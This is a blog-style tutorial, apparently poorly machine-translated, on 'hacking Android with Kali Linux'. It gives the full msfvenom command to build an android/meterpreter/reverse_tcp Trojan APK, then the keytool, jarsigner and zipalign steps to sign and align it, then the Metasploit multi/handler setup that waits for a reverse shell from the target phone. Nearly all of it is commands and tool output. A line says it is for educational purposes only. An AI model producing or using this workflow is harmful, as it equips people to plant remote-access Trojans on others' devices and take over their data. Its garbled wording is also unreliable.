Quick Guide: How to Hack Android with Kali Linux

In our recent post, we learned how to hack windows using Kali Linux. This time we will be jailbreaking android with Kali Linux. We’ll do this using the msfvenom tool in Kali Linux, which is the best combination of Msfpayload and Msfencode. Note: This guide is for educational purposes only.
[*]Prerequisites for Hacking Android

  1. Kali Linux
  2. Android phone: For demo purposes I used Android emulator provided by Google.

[*]Steps to Hack Android

1. Create Payload

To create a Trojan to hack Android, we need to create a payload using the utility msfvenom in Kali Linux.

[email protected]:~# msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > /root/MyPath/my0704.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9485 bytes

In the above LHOST command the IP is set, used in the ifconfig command from Kali Linux.

The above command creates a Trojan apk file that will be installed on the target phone for use, however, before that, we have to sign this apk to install correctly. Follow the steps below the checklist for this.

and. Keystore creation:

[email protected]:~# keytool -genkey -v -keystore my-release-key.Keystore -alias app -keyalg RSA -keysize 2048 -validity 10000

The above command asks questions and a password.

b. Sign the generated file with jarsigner apk.

[email protected]:~# jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore /root/MyPath/my0704.apk app
Enter Passphrase for keystore:
signing: classes.dex
signing: AndroidManifest.xml
signing: resources.arsc
jar signed.
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-08-21) or after any future revocation date.

from. Check out the apk generated with jarsigner.

[email protected]:~# jarsigner -verify -verbose -certs /root/MyPath/my0704.apk

Optimize the file with zipalign apk.

Before getting started, install zipalign using the command below:

apt-get install zipalign

Now let’s optimize apk.

[email protected]:~# zipalign -v 4 /root/MyPath/my0704.apk /root/MyPath/my0704_sign.apk
Verifying alignment of /root/MyPath/my0704_sign.apk (4)...
50 META-INF/MANIFEST.MF (OK - compressed)
281 META-INF/APP.SF (OK - compressed)
623 META-INF/APP.RSA (OK - compressed)
1752 META-INF/ (OK)
1802 META-INF/SIGNFILE.SF (OK - compressed)
2087 META-INF/SIGNFILE.RSA (OK - compressed)
2750 classes.dex (OK - compressed)
8726 AndroidManifest.xml (OK - compressed)
10443 resources.arsc (OK - compressed)
Verification successful

So our final apk that we use to jailbreak android is named as “my0704_sign.apk”.

2. Run msfconsole on Kali Linux to run Android phone.

[email protected]:~# msfconsole
Call trans opt: received. 05-01-17 20:00:10 REC:Loc
     Trace program: running
           wake up, Neo...
        the matrix has you
      follow the white rabbit.
          knock, knock, Neo.
                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit
       =[ metasploit v4.12.22-dev                         ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >

In the above msf line run the android payload and exploit multi-handler with below:

msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler) >

In the command below we are using the IP Kali Linux, can be taken using the command ifconfig on Kali Linux. In addition, we use port number 4444 for operation.

msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) >

And then finally use the command that will wait for the apk to execute on the Android phone.

msf exploit(handler) > exploit
[*] Started reverse TCP handler on
[*] Starting the payload handler...

Executing apk on android.

Here we are using an Android emulator provided by Google. Hence, you need to download the ISO image from site Google.

Once booted, you can create a normal VMware virtual machine and mount that ISO on the virtual machine to start the virtual machine. Setting up Android VM using id gmail.